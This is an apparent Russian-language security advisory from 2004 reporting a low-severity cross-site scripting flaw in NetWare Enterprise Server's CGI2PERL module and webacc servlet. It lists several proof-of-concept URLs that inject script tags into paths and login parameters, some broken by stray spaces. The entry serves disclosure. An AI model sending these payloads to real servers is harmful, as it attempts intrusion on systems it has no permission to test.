Межсайтовый скриптинг в NetWare Enterprise Server

Дата публикации:
27.01.2004
Всего просмотров:
826
Опасность:
Низкая
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Уязвимые версии: NetWare Enterprise Server

Описание: Уязвимость обнаружена в NetWare Enterprise Server в модуле CGI2PERL. Удаленный пользователь может выполнить XSS нападение.

Пример/Эксплоит:


 http://[target]/perl/\<sCRIPT>alert("d")</sCR IPT>\.pl

http://[target]/perl/<script>alert('XSS')</script>.pl

http://[target]/servlet/webacc?User.id="><script>alert('XSS')</script>

http://[target]/servlet/web acc?User.id=&User.password=&User.context=cwqlNomoqd
Oq&User.interface=frames&error=login&merge=webacc&action=User.Login&GWAP.ver
sion="><script>alert('XSS')</script>


http://[target]/nsn/"<script%20language=vbscript>msgbox%20sadas</script>".bas

URL производителя: http://www.novell.com

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: NetWare-Enterprise-Web-Server/5.1/6.0 Multiple Vulnerabilities

или введите имя

CAPTCHA